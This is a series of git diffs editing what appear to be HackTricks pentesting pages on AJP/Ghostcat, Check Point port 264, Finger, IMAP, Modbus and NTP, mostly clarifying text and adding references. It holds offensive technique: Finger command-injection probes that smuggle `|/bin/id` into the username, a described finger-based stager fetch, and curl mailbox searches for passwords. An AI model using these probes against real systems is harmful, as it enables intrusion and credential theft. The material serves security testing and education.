+- [11] [Avahi daemon configuration manual](https://manpages.debian.org/bookworm/avahi-daemon/avahi-daemon.conf.5.en.html)
+- [12] [Ubuntu USN-6487-1 — Avahi vulnerabilities](https://ubuntu.com/security/notices/USN-6487-1)
+- [13] [Apple security content for macOS Sequoia 15.5](https://support.apple.com/en-us/122716)
+- [14] [IETF draft — Using Multicast DNS to protect privacy when exposing ICE candidates](https://datatracker.ietf.org/doc/html/draft-ietf-mmusic-mdns-ice-candidates-03)
+- [15] [Apple security content for iOS 18 and iPadOS 18](https://support.apple.com/en-us/121250)
+- [16] [Windows policy metadata — Configure multicast DNS (mDNS) protocol](https://policypicker.app/policy/windows/network/dns-client/configure-multicast-dns-mdns-protocol-a84770a8a85d)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
+++ b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -4,13 +4,13 @@
 
 ## Basic Information
 
-From [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)<sup>[[3]](#references)</sup>
+The following description comes from DiabloHorn's overview of the protocol:<sup>[[3]](#references)</sup>
 
-> AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content.
+> AJP is a wire protocol. It is an optimized version of HTTP that allows a standalone web server such as Apache HTTP Server to communicate with Tomcat. The web server can serve static content directly and proxy requests for dynamic content to Tomcat.
 
 Also interesting:
 
-> The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles
+> The AJP/1.3 protocol is packet-oriented and uses a binary format. The web server communicates with the servlet container over TCP and can reuse persistent connections for multiple request/response cycles.
 
 **Default port:** 8009
 
@@ -21,11 +21,11 @@ PORT     STATE SERVICE
 
 AJP is usually more interesting than plain HTTP because the backend **trusts the proxy** to set internal request metadata. In modern Tomcat, pay special attention to the connector attributes `address`, `secret`, `secretRequired`, and `allowedRequestAttributesPattern` when reviewing an exposed or reachable AJP service.<sup>[[1]](#references)</sup>
 
-## CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat)
+## CVE-2020-1938 (Ghostcat)
 
-This is an LFI vuln which allows to get some files like `WEB-INF/web.xml` which contains credentials. This is an [exploit](https://www.exploit-db.com/exploits/48143) to abuse the vulnerability and AJP exposed ports might be vulnerable to it.
+Ghostcat is an AJP request-injection vulnerability that can disclose files from a web application, such as `WEB-INF/web.xml`; depending on application behavior and attacker-controlled files, it could also lead to code execution. Public proof-of-concept implementations show how to test the file-disclosure primitive.<sup>[[4]](#references)[[5]](#references)</sup>
 
-The patched versions are at or above 9.0.31, 8.5.51, and 7.0.100.
+The first patched releases were Tomcat **9.0.31**, **8.5.51**, and **7.0.100**.<sup>[[4]](#references)[[6]](#references)</sup>
 
 After Ghostcat, default AJP deployments became less attacker-friendly: Tomcat requires an AJP secret by default, listens on loopback by default unless configured otherwise, and rejects unknown forwarded request attributes unless they match `allowedRequestAttributesPattern`.<sup>[[1]](#references)</sup> However, if you can still reach 8009 from an untrusted network, treat it as a high-value target.
 
@@ -80,7 +80,7 @@ When assessing an AJP-exposed target, look for applications that make security d
 - Source address / proxy metadata (`AJP_LOCAL_ADDR`, `AJP_REMOTE_PORT`, `AJP_SSL_PROTOCOL`)
 - Custom request attributes consumed via `request.getAttribute()`
 
-Modern Tomcat rejects unknown forwarded attributes with **403** unless the name matches `allowedRequestAttributesPattern`, so a permissive regex or legacy connector configuration is worth investigating.
+Modern Tomcat rejects unknown forwarded attributes with **403** unless the name matches `allowedRequestAttributesPattern`, so a permissive regex or legacy connector configuration is worth investigating.<sup>[[1]](#references)</sup>
 
 ## HTTP -> AJP Desync / Request Smuggling
 
@@ -161,6 +161,8 @@ ProxyPassReverse / ajp://<TARGET_SERVER>:8009/
 - [1] [Apache Tomcat 9 Configuration Reference - The AJP Connector](https://tomcat.apache.org/tomcat-9.0-doc/config/ajp.html)
 - [2] [Learning AJP (Doyensec Blog)](https://blog.doyensec.com/2022/11/15/learning-ajp.html)
 - [3] [DiabloHorn - 8009, the forgotten Tomcat port](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)
-- [4] [Chaitin - Ghostcat (CVE-2020-1938)](https://www.chaitin.cn/en/ghostcat)
+- [4] [NVD - CVE-2020-1938 (Ghostcat)](https://nvd.nist.gov/vuln/detail/CVE-2020-1938)
+- [5] [Exploit-DB - CVE-2020-1938 file-read proof of concept](https://www.exploit-db.com/exploits/48143)
+- [6] [Apache Tomcat 9 Security - CVE-2020-1938](https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.31)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md
+++ b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md
@@ -6,6 +6,8 @@ It is possible to query **Check Point Firewall-1** gateways on **264/TCP** for t
 
 On modern deployments this remains useful because **TCP/264** is the `FW1_topo` service used for topology download by SecureClient and Endpoint Security VPN clients.<sup>[[5]](#references)</sup> A response fingerprints Check Point software and suggests that remote-access functionality is configured, but it does not by itself prove that the management server is exposed.
 
+When an applicable control-connection implied rule is enabled, `FW1_topo` traffic can still be accepted even when the explicit rulebase appears restrictive. During review, inspect the gateway's implied-rule configuration instead of inferring TCP/264 reachability from the visible policy alone.<sup>[[5]](#references)[[12]](#references)</sup>
+
 ## Obtaining Firewall and Management Station Names
 
 Using a pre-authentication request, you can execute a module that targets **Check Point Firewall-1**. The necessary commands for this operation are outlined below:
@@ -207,5 +209,6 @@ Compromise of the proxy grants code execution inside the firewall process (SYSTE
 - [9] [Rapid7 PoC: sfewer-r7/CVE-2026-16232](https://github.com/sfewer-r7/CVE-2026-16232)
 - [10] [Check Point Advisory sk185169 – CVE-2026-16232 SmartConsole Authentication Bypass](https://support.checkpoint.com/results/sk/sk185169/)
 - [11] [Check Point Management API Reference](https://sc1.checkpoint.com/documents/latest/APIs/)
+- [12] [Check Point R82.10 – Firewall Control Connections in VPN Communities](https://sc1.checkpoint.com/documents/R82.10/WebAdminGuides/EN/CP_R82.10_SitetoSiteVPN_AdminGuide/Content/Topics-VPNSG/Control-Connections-in-VPN.htm)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md
+++ b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md
@@ -1,10 +1,10 @@
-# # 264/tcp - Pentesting Check Point Firewall
+# 264/tcp - Pentesting Check Point Firewall
 
 {{#include ../banners/hacktricks-training.md}}
 
-It's possible to interact with **CheckPoint** **Firewall-1** firewalls to discover valuable information such as the firewall's name and the management station's name. This can be done by sending a query to port **264/TCP**.<sup>[[1]](#references)[[2]](#references)</sup>
+It is possible to query **Check Point Firewall-1** gateways on **264/TCP** for topology information that can disclose the gateway and management-station names.<sup>[[1]](#references)[[2]](#references)</sup>
 
-On modern deployments this is still useful because **TCP/264** is the `FW1_topo` implied-rule service used for topology download by SecureClient / Endpoint Connect, so it often answers even when the policy is otherwise restrictive. A hit on this port is therefore both a fingerprint for Check Point and a clue that remote-access or management-related functionality is present somewhere behind the gateway.
+On modern deployments this remains useful because **TCP/264** is the `FW1_topo` service used for topology download by SecureClient and Endpoint Security VPN clients.<sup>[[5]](#references)</sup> A response fingerprints Check Point software and suggests that remote-access functionality is configured, but it does not by itself prove that the management server is exposed.
 
 ## Obtaining Firewall and Management Station Names
 
@@ -65,7 +65,7 @@ mgmt_cli show gateways-and-servers details-level full -s id.txt --format json | 
 mgmt_cli logout -s id.txt
 ```
 
-The output commonly reveals gateway objects, cluster members, management IPs, and other pivot points that are much harder to infer from the firewall itself. Remember that the **Management API** lives on the management server, while the **Gaia API** is a separate HTTPS API for OS-level configuration on the gateway.
+The output commonly reveals gateway objects, cluster members, management IPs, and other pivot points that are much harder to infer from the firewall itself. The **Management API** runs on the management server, while the **Gaia API** is a separate HTTPS API for operating-system configuration on a gateway or management appliance.<sup>[[11]](#references)</sup>
 
 ## SmartConsole / Security Management Server Authentication Bypass Workflow
 
@@ -197,14 +197,15 @@ Compromise of the proxy grants code execution inside the firewall process (SYSTE
 ## References
 
 - [1] [Check Point Support Center – Solution sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360)
-- [2] [LFF-IPS-P2 Vulnerability Analysis – Check Point Firewall-1 Topology (Port 264)](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264)
+- [2] [LFF-IPS-P2 Vulnerability Analysis - Check Point Firewall-1 Topology (Port 264)](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264)
 - [3] [CISA Alert: HTTP Parsing Vulnerabilities in Check Point Firewall-1](https://www.cisa.gov/news-events/alerts/2004/02/05/http-parsing-vulnerabilities-check-point-firewall-1)
-- [4] [IBM ISS X-Force Alert #162: Check Point FireWall-1 HTTP Security Server Format String Vulnerability](http://xforce.iss.net/xforce/alerts/id/162)
+- [4] [CERT/CC VU#790771 - HTTP Parsing Vulnerabilities in Check Point Firewall-1](https://www.kb.cert.org/vuls/id/790771)
 - [5] [Check Point sk62692 – Ports used on Security Gateway for SecureClient and Endpoint Security VPN](https://support.checkpoint.com/results/sk/sk62692)
 - [6] [Check Point sk181311 – Response to CVE-2023-28130, Hostname Command Injection in Gaia Portal](https://support.checkpoint.com/results/sk/sk181311)
 - [7] [Check Point sk182336 – Preventative Hotfix for CVE-2024-24919, Quantum Gateway Information Disclosure](https://support.checkpoint.com/results/sk/sk182336)
 - [8] [Rapid7: Check Point SmartConsole Authentication Bypass Technical Analysis (CVE-2026-16232)](https://www.rapid7.com/blog/post/ra-check-point-smartconsole-authentication-bypass-technical-analysis-cve-2026-16232/)
 - [9] [Rapid7 PoC: sfewer-r7/CVE-2026-16232](https://github.com/sfewer-r7/CVE-2026-16232)
 - [10] [Check Point Advisory sk185169 – CVE-2026-16232 SmartConsole Authentication Bypass](https://support.checkpoint.com/results/sk/sk185169/)
+- [11] [Check Point Management API Reference](https://sc1.checkpoint.com/documents/latest/APIs/)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-finger.md
+++ b/src/network-services-pentesting/pentesting-finger.md
@@ -44,7 +44,7 @@ finger user@<Victim>    #Get info of user
 finger -l user@<Victim> #Long format from common UNIX clients
 ```
 
-Alternatively you can use **finger-user-enum** from [**pentestmonkey**](https://github.com/pentestmonkey/finger-user-enum), some examples:
+Alternatively, use Pentestmonkey's **finger-user-enum** for differential username testing and optional relay support:<sup>[[6]](#references)</sup>
 
 ```bash
 finger-user-enum.pl -U users.txt -t 10.0.0.1
@@ -117,10 +117,10 @@ finger "|/bin/id@example.com"
 finger "|/bin/ls -a /@example.com"
 ```
 
-RFC 1288 explicitly allows implementations to execute a **user-controlled program** in response to a Finger query, which is where the classic `|/bin/...` abuse comes from.<sup>[[1]](#references)</sup> This is rare today, but if you find a custom or legacy daemon, test carefully for:
+RFC 1288 permits a daemon to run a program owned or configured by the queried user to generate a response, while warning that the feature is dangerous.<sup>[[1]](#references)</sup> It does **not** standardize `|program` in a network query. The classic payloads above are implementation-specific command-injection probes, so they are relevant only to custom or vulnerable legacy daemons. Test carefully for:
 
 - shell metacharacters in username handling
-- `|program` execution in plan/project hooks
+- `|program` execution or unsafe plan/project hooks
 - backend wrappers that pass the username to a shell script or CGI
 
 Also remember the **client-side** abuse path on Windows: `finger.exe` is a signed LOLBIN that can retrieve arbitrary text from a remote Finger server on **TCP/79**, then feed that output into follow-on tooling.<sup>[[3]](#references)</sup> In recent intrusions this has been used both for **file ingress/exfiltration** and for **ClickFix-style delivery** where the victim is lured into running `finger <nonce>@<domain>` from the Run dialog to fetch a plaintext batch or PowerShell stager.<sup>[[4]](#references)[[5]](#references)</sup>
@@ -171,6 +171,6 @@ If relaying works, use it as an **internal recon primitive** and compare the rel
 - [3] [Finger.exe on LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/Finger/)
 - [4] [Huntress - Can't Touch This: Data Exfiltration via Finger](https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger)
 - [5] [Microsoft - New Clickfix variant 'CrashFix' deploying Python Remote Access Trojan](https://www.microsoft.com/en-us/security/blog/2026/02/05/clickfix-variant-crashfix-deploying-python-rat-trojan/)
+- [6] [pentestmonkey/finger-user-enum](https://github.com/pentestmonkey/finger-user-enum)
 
 {{#include ../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/pentesting-imap.md
+++ b/src/network-services-pentesting/pentesting-imap.md
@@ -6,10 +6,10 @@
 
 The **Internet Message Access Protocol (IMAP)** is designed for the purpose of enabling users to **access their email messages from any location**, primarily through an Internet connection. In essence, emails are **retained on a server** rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done **directly from the server**. This capability allows for the convenience of checking emails from **multiple devices**, ensuring that no messages are missed regardless of the device used.
 
-By default, the IMAP protocol works on two ports:
+IMAP commonly uses two ports:<sup>[[3]](#references)[[4]](#references)</sup>
 
-- **Port 143** - this is the default IMAP non-encrypted port
-- **Port 993** - this is the port you need to use if you want to connect using IMAP securely
+- **Port 143** - cleartext IMAP initially, with an optional upgrade to TLS using `STARTTLS`
+- **Port 993** - IMAP over implicit TLS
 
 ```
 PORT    STATE SERVICE REASON
@@ -20,6 +20,7 @@ PORT    STATE SERVICE REASON
 
 ```bash
 nc -nv <IP> 143
+openssl s_client -starttls imap -connect <IP>:143 -crlf -quiet
 openssl s_client -connect <IP>:993 -quiet
 ```
 
@@ -36,13 +37,15 @@ root@kali: telnet example.com 143
 + TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
 ```
 
-Or **automate** this with **nmap** plugin `imap-ntlm-info.nse`
+Or **automate** this with Nmap's `imap-ntlm-info` script, which obtains the NTLM challenge and reports fields disclosed by the server.<sup>[[5]](#references)</sup>
 
 ### [IMAP Bruteforce](../generic-hacking/brute-force.md#imap)
 
 ## Syntax
 
-IMAP Commands examples from [here](https://donsutherland.org/crib/imap):<sup>[[1]](#references)</sup>
+IMAP command examples from [this crib sheet](https://donsutherland.org/crib/imap):<sup>[[1]](#references)</sup>
+
+Only send `LOGIN` credentials after establishing TLS; RFC 9051 requires implementations to protect cleartext passwords against disclosure.<sup>[[3]](#references)</sup>
 
 ```
 Login
@@ -101,7 +104,7 @@ apt install evolution
 
 ### CURL
 
-Basic navigation is possible with [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), but the documentation is light on details so checking the [source](https://github.com/curl/curl/blob/master/lib/imap.c) is recommended for precise details.
+Basic navigation is possible with curl's IMAP URL syntax.<sup>[[6]](#references)</sup> The examples below retain `-k` for lab systems with self-signed certificates, but it disables certificate verification. Prefer a trusted CA and omit `-k` on real systems; for port 143, use `--ssl-reqd` to require a successful TLS upgrade.<sup>[[6]](#references)</sup>
 
 1. Listing mailboxes (imap command `LIST "" "*"`)
 
@@ -115,9 +118,9 @@ curl -k 'imaps://1.2.3.4/' --user user:pass
 curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass
 ```
 
-The result of this search is a list of message indicies.
+The result of this search is a list of message indices.
 
-Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:
+It is also possible to provide more complex search terms, for example searching drafts for `password` in the message body:
 
 ```bash
 curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass
@@ -133,7 +136,7 @@ curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass
 
 The mail index will be the same index returned from the search operation.
 
-It is also possible to use `UID` (unique id) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g.
+It is also possible to use a `UID` (unique identifier) to access messages. This is less convenient here because the search command must be formatted manually. For example:
 
 ```bash
 curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass
@@ -169,7 +172,7 @@ Protocol_Description: Internet Message Access Protocol         #Protocol Abbrevi
 
 Entry_1:
   Name: Notes
-  Description: Notes for WHOIS
+  Description: Notes for IMAP
   Note: |
     The Internet Message Access Protocol (IMAP) is designed for the purpose of enabling users to access their email messages from any location, primarily through an Internet connection. In essence, emails are retained on a server rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done directly from the server. This capability allows for the convenience of checking emails from multiple devices, ensuring that no messages are missed regardless of the device used.
 
@@ -186,7 +189,7 @@ Entry_3:
   Command: openssl s_client -connect {IP}:993 -quiet
 
 Entry_4:
-  Name: consolesless mfs enumeration
+  Name: Console-less Metasploit enumeration
   Description: IMAP enumeration without the need to run msfconsole
   Note: sourced from https://github.com/carlospolop/legion
   Command: msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS {IP}; set RPORT 143; run; exit'
@@ -196,6 +199,9 @@ Entry_4:
 
 - [1] [IMAP crib sheet - command examples](https://donsutherland.org/crib/imap)
 - [2] [Atmail - IMAP Commands overview](https://www.atmail.com/blog/imap-commands/)
+- [3] [RFC 9051 - Internet Message Access Protocol (IMAP) Version 4rev2](https://www.rfc-editor.org/rfc/rfc9051)
+- [4] [RFC 8314 - Cleartext Considered Obsolete: Use of TLS for Email Submission and Access](https://www.rfc-editor.org/rfc/rfc8314)
+- [5] [Nmap NSE documentation - `imap-ntlm-info`](https://nmap.org/nsedoc/scripts/imap-ntlm-info.html)
+- [6] [curl documentation - IMAP URL syntax and TLS options](https://curl.se/docs/url-syntax.html#imap)
 
 {{#include ../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/pentesting-imap.md
+++ b/src/network-services-pentesting/pentesting-imap.md
@@ -104,7 +104,7 @@ apt install evolution
 
 ### CURL
 
-Basic navigation is possible with curl's IMAP URL syntax.<sup>[[6]](#references)</sup> The examples below retain `-k` for lab systems with self-signed certificates, but it disables certificate verification. Prefer a trusted CA and omit `-k` on real systems; for port 143, use `--ssl-reqd` to require a successful TLS upgrade.<sup>[[6]](#references)</sup>
+Basic navigation is possible with curl's IMAP URL syntax.<sup>[[6]](#references)</sup> The examples below retain `-k` for lab systems with self-signed certificates, but it disables certificate verification. Prefer a trusted CA and omit `-k` on real systems; for port 143, use `--ssl-reqd` to require a successful TLS upgrade.<sup>[[6]](#references)</sup> When documented URL behavior differs from an unusual server, curl's IMAP protocol implementation is also a useful source for confirming the exact command construction and response state machine.<sup>[[7]](#references)</sup>
 
 1. Listing mailboxes (imap command `LIST "" "*"`)
 
@@ -203,5 +203,6 @@ Entry_4:
 - [4] [RFC 8314 - Cleartext Considered Obsolete: Use of TLS for Email Submission and Access](https://www.rfc-editor.org/rfc/rfc8314)
 - [5] [Nmap NSE documentation - `imap-ntlm-info`](https://nmap.org/nsedoc/scripts/imap-ntlm-info.html)
 - [6] [curl documentation - IMAP URL syntax and TLS options](https://curl.se/docs/url-syntax.html#imap)
+- [7] [curl source - IMAP protocol implementation](https://github.com/curl/curl/blob/master/lib/imap.c)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-modbus.md
+++ b/src/network-services-pentesting/pentesting-modbus.md
@@ -1,19 +1,19 @@
-# # 502/tcp - Pentesting Modbus Protocol
+# 502/tcp - Pentesting Modbus Protocol
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## Basic Information
 
-In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently.
+Modicon introduced **Modbus** in 1979 for communication among industrial devices. Current specifications use client/server terminology, although many tools and deployed serial systems still say master/slave.<sup>[[3]](#references)</sup>
 
-**Default port:** 502
+**Default Modbus/TCP port:** 502. The separate Modbus Security profile wraps Modbus in TLS with X.509 authentication and uses port 802; do not assume every Modbus deployment is necessarily plaintext.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```text
 PORT    STATE SERVICE
 502/tcp open  modbus
 ```
 
-**Modbus TCP** usually carries a **7-byte MBAP header** followed by the Modbus PDU:
+**Modbus TCP** carries a **seven-byte MBAP header** followed by the Modbus PDU:<sup>[[3]](#references)</sup>
 
 - **Transaction ID**: matches requests and responses
 - **Protocol ID**: normally `0x0000`
@@ -23,7 +23,7 @@ PORT    STATE SERVICE
 
 The **Unit ID** is frequently ignored by native Modbus/TCP devices, but it becomes critical when the target is a **TCP-to-RTU gateway**. In that case, you usually need to enumerate multiple unit/slave IDs to reach the device behind the bridge.
 
-Modbus traffic is typically **plaintext and unauthenticated**, so passive captures often reveal:
+Legacy Modbus/TCP traffic on port 502 is typically **plaintext and unauthenticated**, so passive captures often reveal:
 
 - The in-use **unit/slave IDs**
 - Which **function codes** the process actually accepts
@@ -83,6 +83,8 @@ print(client.read_device_information(device_id=unit))
 client.close()
 ```
 
+The current PyModbus client uses zero-based protocol addresses and names the unit argument `device_id`; older releases used `slave` or `unit`, so match the example to the installed version.<sup>[[5]](#references)</sup>
+
 Notes:
 
 - **Addressing is a common pitfall**: many operators document holding register `400001`, while libraries expect the **zero-based offset** (`0`).
@@ -99,12 +101,14 @@ modbuster read -s 1 <IP> 400001 10
 modbuster diag -s 1 <IP>
 ```
 
-Other useful frameworks/tools:
+Other useful frameworks/tools:<sup>[[6]](#references)</sup>
 
 - `smod`: function-code enumeration, UID brute force, fuzzing modules
 - `scapy.contrib.modbus`: packet crafting for unsupported or custom workflows
 
 ## Interesting Function Codes
+
+The following standardized function codes and the `0x2B/0x0E` device-identification MEI are defined in the Modbus application protocol specification.<sup>[[3]](#references)</sup>
 
 ### Read / Recon
 
@@ -143,7 +147,7 @@ A practical workflow is:
 
 ## Scapy Packet Crafting
 
-Scapy already ships Modbus packet definitions for the common read/write primitives and for **Read Device Identification**.
+Scapy ships Modbus packet definitions for common read/write primitives and **Read Device Identification**.<sup>[[6]](#references)</sup>
 
 ```python
 from scapy.contrib.modbus import ModbusADURequest, ModbusPDU2B0EReadDeviceIdentificationRequest
@@ -176,5 +180,9 @@ Recent Modbus research and datasets keep emphasizing the same attacker behaviors
 
 - [1] [Nmap NSE: modbus-discover](https://nmap.org/nsedoc/scripts/modbus-discover.html)
 - [2] [MOSTO: A toolkit to facilitate security auditing of ICS devices using Modbus/TCP](https://zaguan.unizar.es/record/127649)
+- [3] [Modbus Organization - Specifications and implementation guides](https://www.modbus.org/modbus-specifications)
+- [4] [Modbus/TCP Security Protocol Specification](https://www.modbus.org/file/secure/modbussecurityprotocol.pdf)
+- [5] [PyModbus client documentation](https://pymodbus.readthedocs.io/en/latest/source/client.html)
+- [6] [Scapy Modbus contrib-layer documentation](https://scapy.readthedocs.io/en/latest/api/scapy.contrib.modbus.html)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-ntp.md
+++ b/src/network-services-pentesting/pentesting-ntp.md
@@ -95,7 +95,9 @@ Pay special attention to ``restrict`` lines, ``kod`` (Kiss-o'-Death) settings, `
 | 2024 | distro updates | **chrony 4.4 / 4.5** – several security hardening & NTS-KE fixes (e.g. SUSE-RU-2024:2022)<sup>[[7]](#references)</sup> |
 | 2014 | NTP reflection at scale | Cloudflare documented a **400 Gbps NTP amplification** attack that abused exposed `monlist` responders. Keep monitoring queries inaccessible from untrusted networks.<sup>[[3]](#references)</sup> |
 
-> **Exploit kits**: Proof-of-concept payloads for the 2023 ntpq OOB-write series are on GitHub (see Meinberg write-up) and can be weaponised for client-side phishing of sysadmins.<sup>[[5]](#references)</sup> 
+The 2023 ntp.org group contains two distinct attack surfaces. **CVE-2023-26551 through CVE-2023-26554** are out-of-bounds writes in `libntp/mstolfp.c`; their records describe a malicious server attacking the **client-side `ntpq` process**, not `ntpd`. **CVE-2023-26555** affects `praecis_parse()` in the Palisade reference-clock driver and requires a more specialized input path, such as a manipulated GPS receiver.<sup>[[5]](#references)[[12]](#references)[[13]](#references)</sup>
+
+> **Operator exposure:** Because CVE-2023-26551 through CVE-2023-26554 are client-side `ntpq` parsing flaws, querying an untrusted or attacker-controlled NTP server is the dangerous direction. Avoid pointing an unpatched diagnostic client at arbitrary Internet hosts; use **4.2.8p16** or a vendor-backported fix.<sup>[[5]](#references)[[12]](#references)</sup>
 
 ---
 ## Advanced Attacks
@@ -195,5 +197,7 @@ Entry_2:
 - [9] [chrony project – chronyc(1) manual](https://chrony-project.org/doc/4.5/chronyc.html)
 - [10] [zgrab2 – ntp module](https://github.com/zmap/zgrab2/tree/master/modules/ntp)
 - [11] [chrony project – chrony.conf(5) source-selection directives](https://chrony-project.org/doc/4.5/chrony.conf.html)
+- [12] [CVE.org - CVE-2023-26551 (`mstolfp` out-of-bounds write)](https://www.cve.org/CVERecord?id=CVE-2023-26551)
+- [13] [CVE.org - CVE-2023-26555 (`praecis_parse` out-of-bounds write)](https://www.cve.org/CVERecord?id=CVE-2023-26555)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-ntp.md
+++ b/src/network-services-pentesting/pentesting-ntp.md
@@ -86,14 +86,14 @@ zgrab2 ntp --monlist --timeout 3 --output-file monlist.json -f "zmap_results.csv
 Pay special attention to ``restrict`` lines, ``kod`` (Kiss-o'-Death) settings, ``disable monitor``/``includefile /etc/ntp/crypto`` and whether *NTS* is enabled (``nts enable``).
 
 ---
-## Recent Vulnerabilities (2023-2025)
+## Selected Vulnerabilities and Operational Risks
 
 | Year | CVE | Component | Impact |
 |------|-----|-----------|--------|
-| 2023 | **CVE-2023-26551→26555** | ntp 4.2.8p15 (libntp *mstolfp*, *praecis_parse*) | Multiple out-of-bounds writes reachable via **ntpq** responses. Patch in **4.2.8p16** 🡒 upgrade or back-port fixes.<sup>[[5]](#references)</sup> |
+| 2023 | **CVE-2023-26551 through CVE-2023-26555** | ntp 4.2.8p15 and earlier | Several low-severity parsing and bounds-checking flaws fixed in **4.2.8p16**; upgrade or back-port the vendor fixes.<sup>[[5]](#references)</sup> |
 | 2023 | **CVE-2023-33192** | **ntpd-rs** (Rust implementation) | Malformed **NTS** cookie causes remote **DoS** prior to v0.3.3 – affects port 123 even when NTS **disabled**.<sup>[[6]](#references)</sup> |
 | 2024 | distro updates | **chrony 4.4 / 4.5** – several security hardening & NTS-KE fixes (e.g. SUSE-RU-2024:2022)<sup>[[7]](#references)</sup> |
-| 2024 | Record DDoS | Cloudflare reports a **5.6 Tbps UDP reflection** attack (NTP among protocols used). Keep *monitor* & *monlist* disabled on Internet-facing hosts.<sup>[[3]](#references)</sup> |
+| 2014 | NTP reflection at scale | Cloudflare documented a **400 Gbps NTP amplification** attack that abused exposed `monlist` responders. Keep monitoring queries inaccessible from untrusted networks.<sup>[[3]](#references)</sup> |
 
 > **Exploit kits**: Proof-of-concept payloads for the 2023 ntpq OOB-write series are on GitHub (see Meinberg write-up) and can be weaponised for client-side phishing of sysadmins.<sup>[[5]](#references)</sup> 
 
@@ -102,9 +102,9 @@ Pay special attention to ``restrict`` lines, ``kod`` (Kiss-o'-Death) settings, `
 
 ### 1. NTP Amplification / Reflection
 
-The legacy Mode-7 ``monlist`` query returns up to **600 host addresses** and is still present on thousands of Internet hosts. Because the reply (428-468 bytes/entry) is *~ 200×* larger than the 8-byte request, an attacker can reach triple-digit amplification factors. Mitigations:
+The legacy Mode-7 `monlist` query can return information about up to **600 recent clients**. A small spoofed request can therefore trigger a much larger multi-packet response, producing amplification factors in the hundreds in vulnerable configurations.<sup>[[3]](#references)[[4]](#references)</sup> Mitigations:
 
-- Upgrade to ntp 4.2.8p15+ and **add** ``disable monitor``.
+- Upgrade to a supported release (at least **4.2.8p16** for the 2023 fixes) and **add** `disable monitor` where legacy monitoring is unnecessary.
 - Rate-limit UDP/123 on the edge or enable *sessions-required* on DDoS appliances.
 - Enable *BCP 38* egress filtering to block source spoofing.
 
@@ -112,7 +112,7 @@ See Cloudflare’s learning-center article for a step-by-step breakdown.<sup>[[4
 
 ### 2. Time-Shift / Delay attacks (Khronos / Chronos research)
 
-Even with authentication, an on-path attacker can silently **shift the client clock** by dropping/delaying packets. The IETF **Khronos (formerly Chronos) draft** proposes querying a diverse set of servers in the background and sanity-checking the result to detect a shift > 𝚡 ms. Modern chrony (4.4+) already implements a similar sanity filter (``maxdistance`` / ``maxjitter``).<sup>[[8]](#references)</sup> 
+Even with authentication, an on-path attacker can attempt to **shift the client clock** by dropping or delaying packets. RFC 9523's **Khronos** mechanism queries a large, diverse server pool and periodically applies a robust selection algorithm to resist time-shifting attacks.<sup>[[8]](#references)</sup> Chrony's `maxdistance`, `maxjitter`, and `minsources` controls are useful source-selection safeguards, but they are configuration controls rather than an implementation of Khronos.<sup>[[11]](#references)</sup>
 
 ### 3. NTS abuse & 4460/tcp exposure
 
@@ -126,7 +126,7 @@ nmap -sV -p 4460 --script ssl-enum-ciphers,ssl-cert <IP>
 openssl s_client -connect <IP>:4460 -alpn ntske/1 -tls1_3 -ign_eof
 ```
 
